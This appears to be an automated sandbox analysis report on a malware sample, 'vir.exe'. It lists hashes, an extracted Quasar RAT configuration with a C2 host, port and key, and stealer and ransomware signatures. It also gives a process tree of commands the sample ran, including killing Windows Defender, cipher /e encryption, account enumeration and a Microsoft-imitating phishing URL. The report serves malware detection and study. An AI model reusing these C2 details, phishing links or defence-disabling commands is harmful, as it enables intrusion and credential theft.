Resubmissions

26-12-2024 15:01

241226-sec6vayjgx 10

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

240818-yjmtqsthkm 10

18-08-2024 14:30

240818-rvdxmsxgjg 10

15-08-2024 23:29

240815-3g3jmawdnq 10

15-08-2024 23:15

240815-28syts1brg 10

15-08-2024 22:57

240815-2w8thszepa 10

Analysis

  • max time kernel
    413s
  • max time network
    419s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 23:15

General

  • Target

    vir.exe

  • Size

    336.1MB

  • MD5

    bc82ea785da1180a8a964b3e54ad106c

  • SHA1

    4c1952ce778455af8ed10dca7b9f77d7815e8d0a

  • SHA256

    c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

  • SHA512

    62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b

  • SSDEEP

    6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

  • MassLogger Main payload 2 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Windows security bypass 2 TTPs 7 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Manipulates Digital Signatures 1 TTPs 1 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 5 IoCs
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 22 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 50 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 6 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 13 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Drops file in Windows directory 19 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 21 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 29 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 32 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 20 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 58 IoCs
  • Suspicious use of SetWindowsHookEx 38 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    "C:\Users\Admin\AppData\Local\Temp\vir.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4376
    • C:\Users\Admin\AppData\Local\Temp\f7c73514-352d-468c-9888-1a95c4f7f6f4\ProgressBarSplash.exe
      "C:\Users\Admin\AppData\Local\Temp\f7c73514-352d-468c-9888-1a95c4f7f6f4\ProgressBarSplash.exe" -unpacking
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2620
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\!main.cmd" "
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3624
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K spread.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5048
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 1 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:4496
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 2 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:4360
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 3 C:\Users\Admin\
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:1388
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K doxx.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig
          4⤵
          • Gathers network information
          PID:1480
        • C:\Windows\SysWOW64\net.exe
          net accounts
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 accounts
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1512
        • C:\Windows\SysWOW64\net.exe
          net user
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user
            5⤵
              PID:1616
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /apps /v /fo table
            4⤵
            • Enumerates processes with tasklist
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4032
        • C:\Windows\SysWOW64\PING.EXE
          ping google.com -t -n 1 -s 4 -4
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4912
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WindowsDefender.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K handler.cmd
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4740
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
            4⤵
              PID:4440
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
              4⤵
                PID:3520
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3904
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
                4⤵
                  PID:3148
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
                  4⤵
                    PID:2844
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                    4⤵
                      PID:3448
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
                      4⤵
                        PID:5616
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
                        4⤵
                          PID:5868
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                          4⤵
                            PID:5288
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
                            4⤵
                              PID:4120
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                              4⤵
                                PID:5280
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
                                4⤵
                                  PID:2796
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
                                  4⤵
                                    PID:5836
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
                                    4⤵
                                      PID:3384
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                                      4⤵
                                        PID:5808
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
                                        4⤵
                                          PID:3260
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                          4⤵
                                            PID:5848
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
                                            4⤵
                                              PID:3040
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
                                              4⤵
                                                PID:2424
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6520 /prefetch:8
                                                4⤵
                                                  PID:2744
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6520 /prefetch:8
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2240
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
                                                  4⤵
                                                    PID:6672
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /K cipher.cmd
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1416
                                                  • C:\Windows\SysWOW64\cipher.exe
                                                    cipher /e
                                                    4⤵
                                                      PID:2092
                                                    • C:\Windows\SysWOW64\cipher.exe
                                                      cipher /e
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2448
                                                    • C:\Windows\SysWOW64\cipher.exe
                                                      cipher /e
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6060
                                                    • C:\Windows\SysWOW64\cipher.exe
                                                      cipher /e
                                                      4⤵
                                                        PID:6008
                                                    • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\Rover.exe
                                                      Rover.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3376
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\web.htm
                                                      3⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:464
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
                                                        4⤵
                                                          PID:3556
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,1073972769638573412,11031580248756333554,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2
                                                          4⤵
                                                            PID:6088
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,1073972769638573412,11031580248756333554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5768
                                                        • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\Google.exe
                                                          Google.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:2784
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\helper.vbs"
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4988
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping google.com -t -n 1 -s 4 -4
                                                          3⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:1388
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping mrbeast.codes -t -n 1 -s 4 -4
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:6256
                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                          xcopy Google.exe C:\Users\Admin\Desktop
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Enumerates system info in registry
                                                          PID:6292
                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                          xcopy Rover.exe C:\Users\Admin\Desktop
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Enumerates system info in registry
                                                          PID:6332
                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                          xcopy spinner.gif C:\Users\Admin\Desktop
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Enumerates system info in registry
                                                          PID:6356
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /K bloatware.cmd
                                                          3⤵
                                                          • Checks computer location settings
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies registry class
                                                          PID:6372
                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\1.exe
                                                            1.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:6460
                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\3.exe
                                                            3.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Modifies registry class
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6568
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1812
                                                              5⤵
                                                              • Program crash
                                                              PID:7156
                                                          • C:\Windows\SysWOW64\mshta.exe
